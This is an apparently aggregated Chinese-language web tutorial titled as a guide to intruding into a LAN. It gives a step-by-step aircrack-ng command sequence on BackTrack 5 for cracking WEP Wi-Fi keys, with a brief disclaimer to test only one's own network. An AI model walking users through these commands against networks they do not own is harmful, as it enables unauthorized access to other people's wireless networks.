怎么入侵局域網(wǎng)
入侵局域網(wǎng)的手段有很多,可以用backtrack5。以下是CN人才小編為您收集整理提供到的怎么入侵局域網(wǎng),歡迎閱讀參考,希望對你有所幫助!
backtrack5入侵局域網(wǎng)教程
非法破解他人的無線網(wǎng)絡(luò)等同犯罪, 請以自己的無線網(wǎng)絡(luò)作為實(shí)驗(yàn)環(huán)境.
首先, 需要準(zhǔn)備:
1.BackTrack 5 光盤版或者虛擬機(jī)鏡像, 也可以是Backtrack5 U盤版
2.一個(gè)兼容Backtrack的無線網(wǎng)卡
3.使用WEP加密的無線網(wǎng)絡(luò)加入點(diǎn)(指的就是你要破解的無線網(wǎng)絡(luò))
點(diǎn)擊進(jìn)入Backtrack5系統(tǒng)下載
需要的全部指令:
(請根據(jù)實(shí)際情況替換粗體部分)
1) ifconfig -a
(可以查看到自己機(jī)子無線網(wǎng)卡的MAC地址和無線網(wǎng)卡的設(shè)備名稱), 保留這個(gè)窗口方便下幾步查看需要的信息, 打開新命令窗口進(jìn)入一步)
2) airmon-ng start wlan0 2
(wlan0為無線網(wǎng)卡, 2為需要監(jiān)聽的'頻道, 根據(jù)自己情況輸入, 此步驟為打開無線網(wǎng)卡的監(jiān)聽模式)
3) airodump-ng –ivs -w name -c 2 wlan0
(獲取頻道2的所有無線AP的信息, wlan0是無線網(wǎng)卡, 2為頻道, 這一步的頻道需要跟上一步的一致, 命令輸入后會(huì)顯示周圍所有頻道為*的無線AP,
顯示的列表:
BSSID : 無線AP的Mac 地址
PWR: AP信號(hào)的大小
RXQ: 干擾值
Beacons:發(fā)送和接受的數(shù)據(jù)包, 有數(shù)據(jù)傳輸?shù)臅r(shí)候就會(huì)跳動(dòng)
#Data: 數(shù)據(jù), 破解需要的最關(guān)鍵的就是這個(gè)
CH:頻道
MB:網(wǎng)絡(luò)連接速度
ESSID: AP的名稱
保留這一窗口, 打開新的命令窗口進(jìn)入下一步)
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0
(發(fā)送欺騙, ap_essid為AP的名稱, 例如Linksys或者TP-Link, ap_mac為AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX為自己無線網(wǎng)卡的MAC地址, 第一步可以看到. 這一步成功后會(huì)顯示Successful, 如不成功需要在信號(hào)強(qiáng)的地方重試, 成功后才可以進(jìn)入下一步)
5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0
(ap_mac為無線AP的mac地址, 具體看步驟3, XXXXXXXX為無線網(wǎng)卡的mac地址, wlan0為網(wǎng)卡, 這一步執(zhí)行以后, 開始正確的收發(fā)數(shù)據(jù)包, #Data開始上漲)
6) aircrack-ng -n 64 -b ap_mac name-*.ivs
(開始破解, ap_mac為ap的mac地址, 64指的是使用了64位加密, 多次破解失敗的話可以試128)
多數(shù)情況下當(dāng)#data開始迅速跳動(dòng)的時(shí)候就可以開始破解了, 不需要等到多少包, 如果#data這個(gè)數(shù)據(jù)增長緩慢的話, 換個(gè)位置到無線信號(hào)強(qiáng)的地方再試, 命令輸入正確的話最快3分鐘搞定一個(gè)64位加密的WEP AP是沒問題的! e網(wǎng)軟摘測試時(shí)用的USB網(wǎng)卡, 如果使用內(nèi)置無線網(wǎng)卡性能上會(huì)提升很多.
【怎么入侵局域網(wǎng)】相關(guān)文章:
計(jì)算機(jī)局域網(wǎng)的基礎(chǔ)知識(shí)05-03
畢業(yè)論文淺談局域網(wǎng)的組建與應(yīng)用的開題報(bào)告10-09
沉睡卡怎么辦怎么處理06-23
生育津貼該怎么算又該怎么發(fā)09-06
怎么拿高薪?03-08
HR怎么晉升10-11
春節(jié)怎么造句03-30
怎么領(lǐng)取低保06-02
怎么鑒定工傷03-17
怎么煮西米露12-17